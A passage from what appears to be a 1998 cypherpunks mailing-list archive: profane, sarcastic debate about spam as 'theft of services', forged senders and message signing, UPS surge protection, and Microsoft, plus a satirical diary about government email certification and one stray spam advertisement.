The InterNet is a communal endeavor. Resources are shared among
those who choose to actively participate in the infrastructure
and the technologies of which it is composed.
Those who wish to participate in only a portion of the activity
and resources shared on the InterNet can do so if they are
willing to take the actions required to limit their participation
and/or exposure on the InterNet.

I do not use Gopher. The use that others make of the program is
not a 'theft of services' that 'wastes' the bandwidth of my ISP.
My ISP does not provide Telnet access. They do so in order to
prevent me from availing myself of cheaper services which are
available at ISP's which are not restrained by their monopoly
To me, *this* is 'denial of service.'

Because of the armed robbery of the government-monopoly ISP
that is available to me, it costs me an unacceptable amount of
money to go to USENET. I don't go there.

Spammer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spammer <spam@dev.null>
Date: Fri, 20 Mar 1998 18:49:02 -0800 (PST)
To: Ian Briggs <ian@deepwell.com>
Subject: Fucking Sheeple / Re: Does Spamming Really Exist?
In-Reply-To: <3512E780.5FBD@dev.null>
Message-ID: <35134477.308E@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Ian Briggs wrote:
> 
> >> Spamming is an 'imaginary' felony, as are anonymity and encryption.
> 
> No, its actually theft of services.
> 
> Imagine if I called you collect anytime I was out and about and your phone
> automatically accepted the charge.  Then I spent a couple minutes filling
> you in on my day, and how I felt.

Then I would be a fucking idiot for willingly giving my business to
a phone company that  would allow this.
The fact is, the only phone company available to me is a monopoly
who will no doubt institute this 'feature' because of your suggestion.
I will have them forward my bill to you...

> 1.  ISP pay for bandwidth.
>         If your outside the US 128Kbps lines can go upwards of several thousand         a
> month.

Then they should expend the time, energy and resources that will
enable them to deny the use of their commonly shared resources
with members of the InterNet community which they do not wish
to support.

> 2.  Spammers relay through other ISP mail servers.
>         This usually kills their mail server, or they get added to Paul Vixie's
> blackhole list.

The InterNet is a shared resource. If the ISP does not want to
share certain resources with this-or-that entity on the communal
resource of the Net, then they can configure their system to
deny reciprocal services to their fellow Netizens.

> 3.  It wastes ISP time.
>         ISP get dozens of complaints a day and have to explain to every newbie
> exactly what spam is, why they got it, etc. etc.

Perhaps they should spend their time configuring their systems to
allow what they feel is most useful to their customers, and tell
those who complain to go somewhere else.

> I know, im an ISP.

I will petition the government to pass laws to prevent your ISP 
from spamming me with posts such as this, which reflect nothing
more than the standard Sheeple position that anything which you 
do not personally desire should be outlawed.

"That which is not permitted, is forbidden."
~ Animal Farm

Spammer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@dev.null>
Date: Fri, 20 Mar 1998 19:17:32 -0800 (PST)
To: The Spectre <spectre@anthrax.net>
Subject: Clarification / Re: UPSs (yeah, it's off topic)
In-Reply-To: <B0000003934@hades.crmcom.com>
Message-ID: <35134BAB.272B@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


The Spectre wrote:
> I get bitched at by list members when I sign my messages.. :)  If I have
> something important to say, I'll sign it.. same goes if people start faking
> them, so far no one has.

What I meant to say was, "if people start faking them without using
spectre@dev.null as a return address so that only really lame fucks
will be fooled by them."
 
-The Spectre (Or so I would have you believe...) [SP4 w/ Clam Cluster]
-http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La
Rochefoucauld






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 20 Mar 1998 12:28:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chicken "anons" and "nobody's"
Message-ID: <199803202028.VAA16207@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> 
> You don't have a clue do you Stan??

Stan, whose mind is held hostage by the heathens at A(h)OL, has not
yet been visited by the revemissionlutionaries of the Army of Dog,
and thus does not realize that the ClueServer died for his sins.

Thus, his body and soul are destined to boil in a big black pot
forged from the melted remains of his own kettles, and fired by
the burning ears of those he has maligned behind their backs, as
are all those who spread FUD out of cluelessness, instead of out
of a genuine desire to be a rabble-rousing shit-disturber.

CardinalBadSpellingMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 20 Mar 1998 19:08:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Champion! / Re: Complaints about spam are TRUE theft ofservices
In-Reply-To: <199803202343.PAA09849@toad.com>
Message-ID: <35135970.4A181F3D@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


Spammer wrote:
 
> A communique from TruthMonger, shortly before he transmorgatized into
> his 'Spammer' persona, informed me that he felt Paul Merrill had
> earned the title of Chief Spammer SpokesPerson/Champion, despite the
> heartfelt compliment that Ross Wright gave TM in one of his missives.
> 
Gee, I'm touched.

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Fri, 20 Mar 1998 22:26:16 -0800 (PST)
To: youanfme@aol.com
Subject: Cold Drinks Taste Better!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



Cold Drinks Taste Better!  (You gotta see this)
 CLICK HERE NOW!!  


CoolBird keeps your favorite beverage COLD for HOURS.  Make your last sip your coldest with CoolBird!

**Perfect for --Birthdays
                  --Father's Day
                  --picnics
                  --BBQ's
                  --Bosses
                  --Lunches
                  --Trips
                  --Work
Great for anywhere and anytime!!!!
 CLICK HERE NOW!!   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Fri, 20 Mar 1998 19:29:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Faked mail from canada? (was : Clarification / Re: UPSs (yeah, it's off topic))
In-Reply-To: <B0000003934@hades.crmcom.com>
Message-ID: <B0000003970@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 21:10 3/20/98 -0800, The Spectre (Or so he would have us believe) wrote:

>The Spectre wrote:
>> I get bitched at by list members when I sign my messages.. :)  If I have
>> something important to say, I'll sign it.. same goes if people start faking
>> them, so far no one has.
>
>What I meant to say was, "if people start faking them without using
>spectre@dev.null as a return address so that only really lame fucks
>will be fooled by them."
> 
>-The Spectre (Or so I would have you believe...) [SP4 w/ Clam Cluster]
>-http://www.anthrax.net/cos
>"No man is clever enough to know all the evil he does."  -  La
>Rochefoucauld

Actually, I said what I meant to say.  If someone fakes it to the list,
then I'll see it now won't I, unless there is another attack or five
happening at the same time to prevent me from getting my mail from the
list, and from getting it anywhere else.

If I saw it then I would post a signed message informing everyone that I
*hadn't* posted it, and continue signing my mails until I felt it was safe
to do otherwise.

Don't feel you have to continue to illustrate your point though, even
though investigation of the headers shows that the message actually
originated from a mail server in canada.. I know you didn't do as much as
you could have to make the message appear authentic.

In any case, I don't see you signing your messages either.


-The Spectre [SP4 w/ Clam Cluster]
-http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La Rochefoucauld





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mirror Site <ms@dev.null>
Date: Fri, 20 Mar 1998 20:38:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Upon further reflection... [WAS: It's not a trick, but it *is* done with mirrors...]]
Message-ID: <35135FD1.3569@dev.null>
MIME-Version: 1.0
Content-Type: message/rfc822


To: Ross Wright <rwright@adnetsol.com>
Subject: Upon further reflection... [WAS: It's not a trick, but it *is* done with mirrors...]
From: Mirror Site <ms@dev.null>
Date: Fri, 20 Mar 1998 21:51:56 -0800
CC: toto@sk.sympatico.ca
Organization: "In reality we talk only to ourselves, but sometimes we talk loud enough  that others may hear us." ~Kahil Gibran
References: <199803210337.VAA14052@orion.sk.sympatico.ca>
Reply-To: ms@dev.null

Ross Wright wrote:
> 
> Good to hear from you, Toto:
> 
> On or About 20 Mar 98 at 20:21, Spammer wrote:
> 
> > Ross,
> >   Your 'pro-spam' writings have often caused me to grind my
> > teeth in objection, for no apparent reason.
> 
> Well, I can not say the same of your writings.  You often bring a new
> spin to an item that makes me re-evaluate my thoughts and viewpoints.
> 
> > Being a Taoist,
> > however, I recognize that friction generally indicates that
> > I am resisting the flow of the universal Tao.
> 
> Excellent.  One must be aware of one's position in the universe.  If
> your tooth grindings serve you as a compass, then it is very wise to
> note same.
> 
> >   It is only now, in supporting your viewpoint out of sheer
> > contrariness, as opposed to being in agreement, that I have
> > finally figured out that your stance is a true CypherPunk
> > position.
> 
> Well, I always thought so.  Even so, the anti spammers mostly wore
> me down, and I rarely post about my fave topic.  I always thought
> CypherPunks were opposed to government regulations of any type.  I
> originally got onto this list because I was told that potential
> customers would be reading this list (ie: code writers).  I never
> realized that it would lead me into the pro-spam position.  Or that
> it would teach me how to bulk mail in a manner that nobody even
> suspects I am spamming.
> 
> >   The InterNet is truly a macrocosm of the many societal
> > microcosms already in existence. It is up to each and every
> > one of us to fit into our environment, strive to change it,
> > or abandon it for a different environment.
> 
> Yikes!  Profound shit, Toto.  How come you didn't post this to the
> list?  Are you pulling my cyber-leg?
> 
> > "Who will help me be a self-actualized individual?" said the
> > New-Age California Little Red Hen.
> 
> Bye for now.
> 
> Ross
> 
> =-=-=-=-=-=-
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://ross.adnetsol.com
> Voice: (408) 259-2795








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 20 Mar 1998 21:29:21 -0800 (PST)
To: Ian Briggs <ian@deepwell.com>
Subject: Re: Fucking Sheeple / Re: Does Spamming Really Exist?
In-Reply-To: <3512E780.5FBD@dev.null>
Message-ID: <35136B20.F6@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Ian Briggs wrote:
> Sweaping generality, yes those of us that want everything we don't agree
> with put
> under penalty of death.
..... 
> No, wait.  Lets change that, we put those that don't agree with us on work
> projects for the 4th Reich.

Right on, Ian!
I'm tired of these anonymous cowards, hiding behind a fake address
such as dev.null, putting down those of us who recognize the need
of petitioning our government to put an end to using the InterNet
for purposes which are against the wishes of the majority.

> 1.  Its theft of services because its using my bandwidth to "harrass" my
> customers.

Exactly. I have been complaining to my ISP about their forwarding posts
from the CypherPunks list that I disagree with. Despite my complaints,
they allow this harrassment to continue.

> 2.  It may destroy my mail server.

Right on! If the anonymous cowards can make points that seem to lack
any sort of logic and sense, then they cannot whine when you do so,
as well.

> 3.  It may detrimentally effect the quality of my business.

Say, Ian...this is beginning to sound like 'whining'...

> 4.  It destroys other ISP mail server.

Although grammatically incorrect and seemingly nonsensical, I am
confident that you are trying to make a valid point.
 
> So back to your normal ranting, as I doubt anyone doesn't have an
> entrenched opinion concerning this.

Exactly. There are no anti-spammers in foxholes. 
 
> Im not the happiest person to be inviting the U.S. Goverment into this
> media, im pretty opposed to the U.S. Goverment in general and specific terms.

As long as they only pass legislation infringing on the rights of
those who are not in agreement with you and I, then our position
could only be seen as hypocritical by those who disagree with us.
 
> You want to know who we currently call for situations like this?
> FBI, executive order gave them all venue over crimes on the Internet via an
> executive order.
> 
> So guess what, the U.S. goverments already here.

And we can't fight City Hall, eh?

> I just don't want Joe Smoooze Dick the Marketing stud starting up his
> garage business selling e-mail lists for $99, cause he can.

This is every bit as despicable as people who sign up as an ISP
provider on the InterNet and then deny others the use of the shared
resources of the Net, because they can.
Some of these evil people interfere with the propogation of Holocaust
propoganda, instead of interfering with anti-Holocaust propoganda, as
is proper to those who oppose censorship.
 
> by the way, putting @dev.null in your return address
> thats pretty tricky, I bet you have a business card
> that says 31337.  I bet they teach that in all canadian
> schools.  Elite 101.

Those fucking FrostBacks think that they can crawl across the
49th virtual parallel and insult the memory of Dave Null, Defender
of the Void, with impunity. As soon as I look that word up, I'm
going to give them a piece of my mind. (This is a generous offer,
seeing as how I don't have much left).

~~~~
Toto <toto@dave.null>
~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 20:40:55 -0800 (PST)
To: shadow@tfs.net
Subject: Re: UPSs
Message-ID: <94b30653.35134453@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-20 19:13:07 EST, shadow@tfs.net writes:

<< some protection is better than none. my roommate and I have our
 computers in the same room off of the same outlet but my computer has an
 UPS and his does not. During a storm, lightning hit near the apartment
 building and it took out his computer but not mine. But I do have a
 friend who lost his computer to a direct strike to the power lines and
 it took out the surge strip as well. At least in my case, it was not a
 direct strike into the power lines but what happened to my roommate made
 him get an UPS to at least have some protection next time. At least he
 will not have to possibly shell out another $1,500 for another computer. >>

I cannot argue against 'some is better than none' (or, if you're adding onto
your existing internal power supply, 'more is better than some').

BUT, of all things, when lightning strikes close to me, it takes out my modem,
nothing else. (and it's happened more than once (and they say it doesn't ever
strike in the same place twice!  ;-)  ))

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Mar 1998 00:05:45 -0800 (PST)
To: "Ross Wright" <ian@deepwell.com>
Subject: Re: Complaints about spam are TRUE theft of services
In-Reply-To: <199803202326.PAA09734@toad.com>
Message-ID: <3.0.5.32.19980320234658.0090d5f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 PM 3/20/98 -0700, Ross Wright wrote:
>No, actually your complaints about spam are TRUE theft of services. 

If you're a spammer, you're in no position to complain.

>[Anecdotes about somebody receiving more complaints about spam
than actual spam.]

Complaints about spam are free speech, and by encouraging Internet providers
to increase the size of their networks, they're obviously commerce :-)

Anecdotes are just anecdotes; except during the occasional flame war about spam, 
I generally receive a lot more spam than complaints.  And at least the 
complaints have some creative thought behind them, unlike the spam...
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 20 Mar 1998 23:08:36 -0800 (PST)
To: Alec McCrackin <camcc@mindspring.com>
Subject: Important Information!
Message-ID: <351381E3.3360@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain

If you have received several copies of all of my pastes to the
CypherPukes list tonight, rest assured that it is a direct result
of my being a drunken asshole.
I have heard a rumor that the CypherPukes are taking up a collection
to get me an account on AOL. Can there be any greater disgrace?


To: cypherpunks@toad.com
Subject: Re: Micro$not Ba$hing
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 07:19:30 +0100 (MET)
Organization: Replay Associates, L.L.P.
Sender: owner-cypherpunks@toad.com

Eric Tune wrote:
> Out of all the things I've heard said about Bill Gates, about
> Microsoft, (both as the Evil Empire and as a God-send) this makes
> about the most sense.  Truthmonger has it right.  

At the risk of having list members speculating that this anonymous
post is being sent by Toto/TruthMonger in order to gloat his dropping
Pearls of Wisdom upon those with weak connections to the ClueServer,
I would like to compliment Eric Tune on his recognition of my...Uhhhh,
I mean *TruthMonger*'s sense of Reality.

 > The ONLY significant in-roads that anyone has made with a Unix
> environment is Linux and BSD, and all the wishing in the world is not
> going to make it more palatable to "John Q. Public".  Unfortunately,
> Unix is a lot harder to learn for someone who started out in DOS or
> Mac software, and it's not near as user friendly.  What could be the
> incentive to NOT take Win95/NT/MacOS/OS2, which all have wide software
> bases, as opposed to the closed world of Unix?  John Q. Public doesn't
> want all this trouble, he just wants his kids to be able to research
> their history reports on the web, and for himself, to download a
> little late night skin pics when the wife is late from bingo.  He's in
> control of how the computer game is played these days, even if he
> doesn't understand it.

I *love* UNIX/Linux, but I have no illusions that they comprise a
viable option for John and Jane Q., unless they are provided at a
reasonable price, with GUI's that are usable by people who desire
to be able to use a computer without becoming a dweeb/guru/expert.
 
> Microsoft shouldn't be blamed because they were smarter than the rest
> of the industry, and when they couldn't be smarter, well, buying the
> other company works too.  Every one of you would do it the same way if
> you were Bill Gates running the largest software empire in the world,
> whether you would like to admit it or not.

This is exactly what the Anti-Micro$not Coalition is attempting. Instead
of making their software available to M.E. Tarzan and U. Jane at a
competitive price, they are attempting to prevent someone who sought
and got (Hey! I'm a poet...) their business from offering them even
more affordable software extensions to their basic operating system.
If providing the end-user with the tools to use their modem and the
InterNet is an anit-trust violation, then shouldn't the same concept
apply to OS vendors who provide tools for their customers to use
their printers, etc?

The much maligned 'Sheeple' desire only to have an OS that provides
them with the tools to use the products that they purchase from 
computer vendors.
The fact that Macintosh suffered in the marketplace from offering a
complete package for more money, while the PC vendors offered a more
affordable package which required additional purchases of software
to accomplish the same ends, is not a reflection on the stupidity
of J&J Q. Public. It is a reflection on the ignorance/unwillingness
of Apple to properly advertise the discrepancies in entry-level costs
versus end-result costs.
Tire companies are taking advantage of the shennanigans of their
competition by pointing out that their prices include such 'additional
items' such as valve stems, balancing, air, etc. Apple and Sun were
not constrained by Micro$not from doing the same thing.

Many of the UNIX/SCO systems that I sold to my customers were the 
result of my explaining cost-benefit ratios which I had to analyze
for myself, with no help from those actually producing/selling the
product.
As a former vendor who sold operating systems which were in comptetion
with DOS/Windows, despite the fact that their manufacturers were not
actively seeking my business, I feel no compunction in calling them
to task for attempting to suppress their competition by calling upon
the government to make them quit giving the public what they desire.

Sincerely,
...uuuhh...I can't remember what persona I am posting under...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 20 Mar 1998 23:35:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <858794b0d66cf1f95b7a9df28fd3b0aa@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


> > >   It is only now, in supporting your viewpoint out of sheer
> > > contrariness, as opposed to being in agreement, that I have
> > > finally figured out that your stance is a true CypherPunk
> > > position.

I have long held that most of those passing through the hallowed halls
of the cypherpunks list are not cypherpunks, but entities who are
striving to become cypherpunks--once they succeed, most of them move
on to other pursuits and activities.
Thank God that there are those who maintain their presence on the list
over long enough periods of time to help newbies and neophytes to
develop a cypherpunk frame of mind.

> > >   The InterNet is truly a macrocosm of the many societal
> > > microcosms already in existence. It is up to each and every
> > > one of us to fit into our environment, strive to change it,
> > > or abandon it for a different environment.
> >
> > Yikes!  Profound shit, Toto.  How come you didn't post this to the
> > list?  Are you pulling my cyber-leg?

Ross Wright, spam-promoter extraordinare, has become so gun-shy that
he can no longer recognize the difference between sarcasm and a post
by someone who recognizes that all alleged 'spammers' cannot be lumped
into the same stereotypical melting pot.
There are those who send 60 million emails out to Dog-and-everybody,
without regard to suitability to their sensibilities, and there are
those who strive to target their emails toward those who may actually
have an interest in their offerings.

Life itself is a double-edged sword. To compete with the shotgun 
spammers, those who wish to target an audience which is likely to
have a specific interest in their product or cause have need of
a database which will help them to categorize the interests of those
who traverse the WWW. In doing so, they run the risk of being lumped
in with those who use the same technology to monitor the same users
in order to work against their self-interest.

> > > "Who will help me be a self-actualized individual?" said the
> > > New-Age California Little Red Hen.

Nobody. For an extended explaination, read Horatio Alger.

PrecedentMonger II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Integration <abrams@philos.umass.edu>
Date: Fri, 20 Mar 1998 23:48:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fucking Sheeple / Re: Does Spamming Really Exist?  Um, yes.
Message-ID: <199803210748.CAA07357@wilde.oit.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > projects for the 4th Reich.
> Right on, Ian!
> I'm tired of these anonymous cowards, hiding behind a fake address
> such as dev.null, putting down those of us who recognize the need
> of petitioning our government to put an end to using the InterNet
> for purposes which are against the wishes of the majority.
> > 1.  Its theft of services because its using my bandwidth to "harrass" my
> > customers.
> Exactly. I have been complaining to my ISP about their forwarding posts
> from the CypherPunks list that I disagree with. Despite my complaints,
> they allow this harrassment to continue.

December 8, 1997:  Today at work, I got an email from a company selling 
genital enlargers.  I was shocked: how did they get my email address?  I 
sat there at work, reading this email.  Then, as if waking from a dream, 
I looked at my watch.  I had wasted 5 whole minutes of my work time!  I 
quickly deleted the email, and went on my merry way.

December 10, 1997:  It happened again.  This time they wanted me to buy 
Disco albums from the 70's.  I was irate!  Susan overheard me mumbling to 
myself, and told me that just recently, she had received an email from an 
unknown source that had the word 'masturbate' in it.  I asked her if it 
was a harrasing email, and she quickly explained that it was an email 
regarding a certain medical condition, for which the emailer had a 
medical cure.  But still, she said.  She did look pretty flustered.  I 
shook my head and looked at my watch.  Damn!

January 23, 1998:  I just learned how to install email filters.  I can 
now block email marked 'bulk mail' or with certain generic 'to' fields.  
But it took me a goddamn day to install the damn filter.  I was talking 
to Joe, and he said that last week, he had to do the very same thing!  It 
seemed our whole company was up in arms!

January 30, 1998:  Joe, Susan, some others and I met with your system 
administrator today and asked him to install the filter automatically for 
everyone in the office.  He seemed hesitant, and even balked at doing it 
until we convinced The Boss to knuckle him under until he did it.  We 
were all very relieved.

February 15, 1998:  Stan, our system administrator, has been having a lot 
of trouble meeting all of the various filtering needs of the office, and 
so he said he is going to meet with our area service provider and see if 
they can do something in their system that would filter out more of the 
junk getting in to our office.  Today, someone said they had received 
email from some list of crypto punks or something like that.  I asked 
him, "What the hell is this world coming to?  Why can't we just be free 
of these goddamn punks and freaks cluttering our email with trash!"  He 
nodded righteously, and explained that he'd just subscribed to that 
crypto punk list last week, and he couldn't believe that he had to read 
such shit.

April 1, 1998:  I was reading the newspaper today, and an article caught 
my eye.  It said that a nationwide consortium of ISPs had gotten together 
and banned all email that met a certain basic description.  'Junk Mail' 
they called it, and it ranged from 'unwanted' list mail to anything 
'indecent' or 'obscene' or obvious 'spamming' type email.  Apparently, 
sophisticated lexical gates were being put in place on a huge number of 
servers nationwide to help stop the spam.  I was so happy I almost cried.

April 2, 1998:  The United States Government passed an emergency 
Communication Freedom Act, citing as a primary reason the acts of the 
consortium of ISPs.  The Government cited business interests as a primary 
reason for instituting a change in the policies of the ISPs.  The article 
in today's Times said that the newly formed Bureau of Internet 
Communications Privileges would meet with the consortium of ISPs, as well 
as other ISPs that had not agreed to the terms of the consortium, to work 
out a mandatory, fair and equitable agreement for validation of internet 
materials.  The Government was adamant that business related emails 
should, in some form or fashion, be allowed, even as 'spam', given proper 
certification.  I realized that I didn't mind that email trying to sell 
me a genital enlarger that much after all.

June 4, 1998:  Today at work, Stan, the system admin, held a meeting for 
managers.  He wanted to explain to us the new Government Certification 
System (TM).  The Government instituted a policy and technical 
implementation of it that would have the following features: (1) all 
personal email would be automatically parsed for indecent content in 
accordance with FCC rules, with the exception of 'adult channel' email, 
which required a special fee-based service, also certified by the 
Government, to be attached to one's account.  (2) all business email 
would be queued in a Certification Queue, and would be inspected for 
content if it was registered as 'bulk mail'.  Only companies who 
registered and paid a nominal fee to the Government would be allowed to 
use 'bulk mailing'.  (3) all encryption would have to be done with a 
key-escrowed encryption service.  That would insure that the Government 
could validate Certification on every email.  Incomprehensible email or 
otherwise suspicious email would be subject to instant deletion.  At 
work, things were going smoothly: Susan and Joe had no complaints.  I was 
so relieved that finally the Government had stepped in and fixed the 
Internet.

December 21, 1998:  Today in the Globe, there were two very interesting 
articles about the new Government Certification System.  The first 
article claimed that the system was now completely in place, and had even 
begun having noticeable effects: email and web traffic were down by .25% 
over the last 21 days!  Workplace reports on annoying and harrassing 
email or web content were down dramatically!  Businesses had jumped to 
sign up for certification, and according to the report, the Government 
claimed that the revenues generated were 'at least enough to fund the 
project and associated costs'.  What a relief for the economy!  The 
second article was more scandalous: apparently, 3 women had independently 
reported that President Clinton had 'cybered' with them on IRC chat 
channels.  One woman claims that he even made 'lewd and unbecoming' 
remarks.  The Bureau will be required by a Federal Court to turn over the 
transcripts and any necessary cryptographic keys next Monday for all 
sessions over the last 4 weeks.  This will help confirm or deny the 
allegations being pressed against the president.

January 1, 1999:  As I was walking down the Parade Route this morning, 
the headline on the Times caught my eye: "Group of Cryptographers 
Arrested".  I walked over to the machine and put in some change.  The 
article reported that a group of Cryptographers from the University of 
Berkeley and MIT were arrested on charges of including an unpatented and 
uncertified encryption scheme in freeware products distributed by the 
GNU/FSF.  The four professors claimed that they had repeatedly filed for 
patents but had been denied.  They also explained that the software in 
which the alleged 'cryptography' was bundled in was only for use in 
securing personal home systems from unauthorized personal use.  The 
Government issued a statement to the effect that cryptography is 
cryptography.  I did not really understand the details of the article, 
about the cryptography and the legal arguments and stuff, but I sure was 
mad at those four professors!

January 8, 1999:  What a scandal!  The mayor of Los Angeles was arrested 
today for 'the use and distribution of unauthorized pornography'.  The 
mayor claims that he only sent the pictures to his friend in Sacramento.  
But the law is the law.  The fine is supposed to be $250,000!  I was very 
disappointed in they mayor.  Imagine: SWIMSUIT photos!

January 11, 1999:  I just received my first subscription to Government 
Unix Magazine today.  The feature article was about Linux.  Apparently, 
Linux applied for Government Certification for Use of the Internet for 
Commerical and Distribution Purposes, and was turned down.  Government 
officials said that, "Linux is not a government approved project.  The 
people who wrote linux were a bunch of hackers.  The code is distributed 
for free.  That means anyone can go out there and put viruses and 
encryption right in the software!  How could we certify such a project?"  
In other news, Microsoft, after receiving certification from the 
Government, got permission to sponsor its own Automatic Updates Channel.  
Anyone connected to the internet will be automatically updated with 
upgrades and patches of MS Windows software.  Non-windows users will be 
alerted repeatedly and incessantly by email that they don't have Windows 
until they finally break down and buy it.

January 28, 1999:  Today, two teens were arrested and detained 
indefinitely by undercover agents who claimed that they had intercepted 
an encrypted transmission issuing from one of the teens' computers that 
was encrypted with an unknown protocol.  The transmission was headed for 
Russia, and authorities suspected that the teen was sending sensitive 
information illegally.  When I read the report, my heart filled with 
pride!  Home of the Brave, Land of the Free, the *U* *S* of *A*!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 20 Mar 1998 23:54:28 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: UPSs
In-Reply-To: <94b30653.35134453@aol.com>
Message-ID: <35139C5E.324BE47A@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


StanSquncr wrote:
> 
> In a message dated 98-03-20 19:13:07 EST, shadow@tfs.net writes:
> 
> << some protection is better than none. my roommate and I have our
>  computers in the same room off of the same outlet but my computer has an
>  UPS and his does not. During a storm, lightning hit near the apartment
>  building and it took out his computer but not mine. But I do have a
>  friend who lost his computer to a direct strike to the power lines and
>  it took out the surge strip as well. At least in my case, it was not a
>  direct strike into the power lines but what happened to my roommate made
>  him get an UPS to at least have some protection next time. At least he
>  will not have to possibly shell out another $1,500 for another computer. >>
> 
> I cannot argue against 'some is better than none' (or, if you're adding onto
> your existing internal power supply, 'more is better than some').
> 
> BUT, of all things, when lightning strikes close to me, it takes out my modem,
> nothing else. (and it's happened more than once (and they say it doesn't ever
> strike in the same place twice!  ;-)  ))
> 
> Stan

They do sell protectors for phone lines, too.  They are typically
marketed as notebook protectors, but I don't think your RJ-11 will mind
too much.

PHM

(APC has them I know)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Integration <abrams@philos.umass.edu>
Date: Sat, 21 Mar 1998 00:47:19 -0800 (PST)
To: toto@sk.sympatico.ca
Subject: Re: Fucking Sheeple / Re: Does Spamming Really Exist?  Um, yes.
In-Reply-To: <"Toto"@Mar>
Message-ID: <199803210847.DAA26952@wilde.oit.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> You are more creative and astute than I am in even my most egotistical
> and self-congratulatory states of being.
> Please cease and deceasist!
> 
> ROTFLMAOMonger
> 
> Integration wrote:
> > December 8, 1997:  Today at work, I got an email from a company selling

You are too kind!  I'm just giving what is wanted... some candy and some 
medicine.

BTW, no need for a cease and desist.  I'm sure such an outpouring is 
fortunately infrequent.

*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 20 Mar 1998 20:57:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Faked mail from canada? (was : Clarification / Re: UPSs
Message-ID: <199803210457.FAA27438@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The Spectre wrote:
> In any case, I don't see you signing your messages either.

Yes I do...


	 __________________________________
	|                                  |
	|        Watch For CypherPunks     |
	|                                  |
	|         Next Ten Posts           |
	|                                  |
	|                                  |
	 ----------------------------------
	                ||
	                ||
	                ||
	                ||
	                ||
	                ||
	                ||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 20 Mar 1998 22:19:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Micro$not Ba$hing
Message-ID: <199803210619.HAA08464@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Tune wrote:
> Out of all the things I've heard said about Bill Gates, about
> Microsoft, (both as the Evil Empire and as a God-send) this makes
> about the most sense.  Truthmonger has it right.  

At the risk of having list members speculating that this anonymous
post is being sent by Toto/TruthMonger in order to gloat his dropping
Pearls of Wisdom upon those with weak connections to the ClueServer,
I would like to compliment Eric Tune on his recognition of my...Uhhhh,
I mean *TruthMonger*'s sense of Reality.

 > The ONLY significant in-roads that anyone has made with a Unix
> environment is Linux and BSD, and all the wishing in the world is not
> going to make it more palatable to "John Q. Public".  Unfortunately,
> Unix is a lot harder to learn for someone who started out in DOS or
> Mac software, and it's not near as user friendly.  What could be the
> incentive to NOT take Win95/NT/MacOS/OS2, which all have wide software
> bases, as opposed to the closed world of Unix?  John Q. Public doesn't
> want all this trouble, he just wants his kids to be able to research
> their history reports on the web, and for himself, to download a
> little late night skin pics when the wife is late from bingo.  He's in
> control of how the computer game is played these days, even if he
> doesn't understand it.

I *love* UNIX/Linux, but I have no illusions that they comprise a
viable option for John and Jane Q., unless they are provided at a
